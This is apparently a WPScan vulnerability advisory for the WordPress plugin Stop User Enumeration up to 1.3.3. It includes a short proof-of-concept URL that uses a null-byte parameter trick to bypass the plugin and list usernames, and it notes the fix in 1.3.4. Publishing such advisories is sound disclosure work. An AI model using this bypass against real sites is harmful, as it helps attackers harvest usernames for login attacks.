Stop User Enumeration <= 1.3.3 - Username Enumeration Bypass
Sign up to our free email alerts service for instant vulnerability notifications!| Description | Using the plugin "Stop User Enumeration 1.3.3" is possible bypass it to get the usernames. |
| Proof of Concept | Blocked: http://www.example.com/?author%00=%001 Passed: http://www.example.com/?bypass=1&author%00=1 |
Affects
| Plugin |
stop-user-enumeration
fixed in version 1.3.4
|
References
| URL | https://wordpress.org/plugins/stop-user-enumeration/changelog/ |
| URL | https://plugins.trac.wordpress.org/changeset/1390935/stop-user-enumeration |
Classification
| Type | BYPASS |
Miscellaneous
| Submitter | Carlos Montiers Aguilera |
| Views | 201 |
| Verified | No |
| WPVDB ID | 8436 |
Timeline
| Publicly Published | 2016-04-01 (about 1 year ago) |
| Added | 2016-04-11 (about 1 year ago) |
| Last Updated | 2016-04-11 (about 1 year ago) |
Copyright & License
| Copyright | All data and resources contained within this page and this web site is Copyright © The WPScan Team. |
| License | Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us. |
